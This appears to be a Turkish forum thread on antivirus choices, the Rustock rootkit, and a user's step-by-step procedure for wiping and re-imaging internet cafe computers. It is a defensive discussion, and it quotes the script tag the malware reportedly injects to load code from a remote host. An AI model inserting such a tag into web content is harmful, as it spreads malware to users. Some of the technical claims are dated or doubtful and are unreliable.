ben avasti tercih ediyorum. cunku o sistemle birlikte calistigi icin silinmeyebilir avast bu anda devreye giriyor pc acilmadan tariyo tum virusleri siliyo taradiktan sonra aciliyor
virus bilgisayara girmemiş ki girmeye calısıyo nod32 de " kocum benim " virusu girmeden engelliyor.bunun kotu bir yanı yok.girdigin site ile ilgili olması lazım.ya da baslangıc sayfana falan bak orda hangi site acılıyor.
Rustock, sisteme bulaşıp winlogon.exe'nin hafızasında çalışmaya başlıyor. Bulaştıktan sonra çalışmak için ne bir ek işleme, ne kayıt defterine, ne de başka bir dosyaya gerek duyuyor. Bu yüzden Windows'u bozmadan 1-2 dosya/girdi silerek bu rootkitten kurtulamıyoruz. Kısaca sisteme bulaştığında Windows'un bir parçası haline geliyor. Kernel (çekirdek) seviyesinde çalıştığı ve gelişmiş yöntemler ile gizlendiği için uzun bir süre saptanamadan etkin olarak yaşamına devam ediyor. Bu tür zararlıları HIPS yazılımları ve Vista'nın UAC korumasıyla sisteme bulaşmadan engelleyebiliriz, fakat; Rustock'un sistemelere nasıl bulaştığı henüz bulunabilmiş değil. Bulaştıktan sonra nasıl sileceğimiz konusu ise epey karışık aslında AntiRootkit yazılımı henüz yok. Bir bilgisayar ağında iseniz diğer bilgisayarlarda bu Rootkit'i birbirlerine bulaştırıyorlar, haberleşme bilgilerin başina <SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT> satirini ekliyor ve ağdaki tüm makinelere bulaşıyor. Tarayıcı ayarlarınızı (IE 6-7) sıfırlamayı denemeniz tavsiye. Denetim Masası/Internet Seçenekleri/Gelişmiş/Sıfırla Ayarları sıfırladıktan sonra tarayıcı eklentileri devre dışı kalacaktır. Eklentileri tekrar aktif hale getirmek için; Denetim Masası/Internet Seçenekleri/Programlar/Eklentileri yönet
Arkadaşlar Forumda Hala Online Games JS Realplayer Truva Atı Ve Benzeri Virüs Saldırılarının Devam Ettigini Görüyorum Kimse Yanlış Anlamasın Ama Mutlaka Bi,r Yerde Eksik Yapıyorsunuz Kendi Kafem Dahil 17 Kafeye Kurulum Yaptım ve hiçbir sorun yok hala hemde usb ler açık ve flash disk kart okuyucu hala kullanılır durumda ilk kurulum yaptıgım arkadaşın 4 ay oldu hala sorun yok
Aşama 1 ) ilk önce modemden link kablosu çekilir ve diger tüm pc lerin ag kablosu çekilir sonra modeme reset atılır fabrika ayarlarına geri dönülür fakat tanıtılmaz kullanıcı adı ve bilgileri girilmez
Aşama 2) Tüm Pclerin Hardiskleri Sökülür Ve bir pc de hepsine Fdisk çekilir ardından da xp cd si ile sadece biçimlendirme yapılır biçilendirme kısmı bittikten sonra yükleme yapmadan hardisk çıkarılır kenara koyulur tüm hardisklere aynı işlem uygulanır ( not : Mutlaka hardisk kaça bölündüyse tek yapın c-d-e ne varsa biçimlendirin ve tek kalsın image atarken image programları zaten hdd yi kaça bölünmüşse o şeklde imajlıyor)
Aşama 3 ) ana (server) makinaya fdisk çekilir tüm partisyonlar c-d-e kaç bölüm varsa müzikler klipler flimler oyunlar her şey formatlanacak birtek resim bile kalmayacak eski sistemlerden yedekleme yapılmayacak ana pc de xp cd ile fdiskten sonra biçimlendirilecek ve kuruluma başlanılacak arkadaşlar mutlaka dikkat etmeniz gereken lerden biri defalarca bahsettigim gibi eski sistemelrden hiçbirşey yedekleyip kullanmayınız Ve flash disk hafıza kartı kafede kullanılan onlarda biçimlendirilecek daha sonra ana pc kurulumu yapılacak internet ile alakalı bölüm varsa güncelleme vs kurulumun son kısmına bırakılacak
Aşama 4 ) bir pc master olarak hazırlanacak gerekli programlar ve oyunlar cd lerinden kurulacak ancak bu cd leri ana pc de antivirüs programı ile mutlaka taratınız herhangi bir uyarı alırsanız cd lerde virüsle ilgili mutlaka bu cd leri kullamayınız ve ana pc ye bulaşma riskini göz önünde bulundurup ana pc yi yeniden kurunuz ve bu master olarak hazırlayacagımız pc yi programlarını oyunlarını kurduktan sonra nod 32 kuralım ve servis paketi 3 kuralım ve Macromedia shockwave flash player active x eklentisi virüsler bu açıgı kullanarak geldigi için sitede daha önce verilmişti özel bir sürüm ama isteyen olursa link veririm bu sürümünü kuralım ve ardından servis paketi 3 den sonra microsoftun çıkarmış oldugu 7 adet kritik güvenlik güncellemesi var bunlarıda yapalım şimdi diyeceksinizki internet olmadan nasıl güncelleme yapacaz ben kendim kafe dışında virüsle alakası olmayan bi yerde servis paketi 3 ve güncellemeleri bir cd ye indirdim ve oradan yapıyorum kurulumunu ama bir kafedede master olarak hazırladıgım pc nin işi bitince modemi tanıtıp sadece bu hazırladıgım pc e ag kablosunu takıp gerekli güncellemeri yaptım ve virüs programınıda güncelledim ve daha sonra ag kablosunu çıkardım sizde buşekilde yapabilirsiniz ama işiniz bitince modemi kapatın mutlaka
Aşama 5 ) imaj atmaya başlayabiliriz artık her şey hazır oldugundan imaj atmaya başlıyabiliriz ben image için acronis true image programını kullanıyorum iamj atıyoruz farklı chipsetler dahi olsa farklı anakartlar dahil olsa image işlemi bittikten sonra farklı chipset ve anakartlar olan pc ler açılmayacak ve mavi ekran yada devmalı reset atacak bunun için o pc ye xp cd sini takıyorum ve onarma yapıyorum xp yi tekrardan kuruyor ve böylece oyun program kurma derdi olmuyor sadece onarmadan sonra driver tnıtıyorum bu kadar imaj işlemi de bitti
Aşama 6) iamj işlemide bittikden sonra tüm pc lerin isim ip veriyorum ve counter ve benzeri ag oyunları için cd key degiştiriyorum daha sonra handycafeyi msconfigden etkinleştiriyorum ve deepfreze kuruyorum pc leri kullılmaya hazır hale getirip ana pc ye geçiyor ve ana pcye anti arp adlı programı kruyorum ve Bismillah çekip modemi açıyorum ve tüm pc lerina g kablolarını takıyorum geçmiş olsun bugüne kadar 17 adet kafe kurdum sadece bu virüsler yüzünden ve hiçbirinde bir sorun çıkmadı yazılanları uygulayın ve rahat edin arkadaşlar hepinize hayırlı işler bol kazançlar virüssüz günler ayrıca yazımda imla hataları olabilir şimdiden imla hataları için özür dilerim ARKADAŞLAR BİZZAT YAZILANLAR BANA AİTTİR TEK TEK DENEDİM HİÇBİR SORUN YOK BU ŞEKİLDE KURTULURSUN BU VİRÜSLERDEN
Gigabyte p35 dsr 3 Anakart İntel QuadCore 6600 işlemci Kingston 800 Mhz 2Gb ddr 2 ram *2 Asus 8800 Gt 512 Mb Fsp 700 Watt Power Supley Samsung 932 B Monitör Skystar 2 Digitial Uydu Kartı 400 Gb Samsung Hdd *4 500Gb samsung Hdd *2 1Terabyte WesternDigital My Book Creative 2+1 Sb 300 Coolmaster Rc 810 Kasa Lg Dvd Wr Lg CdWr Dvd Rom Combo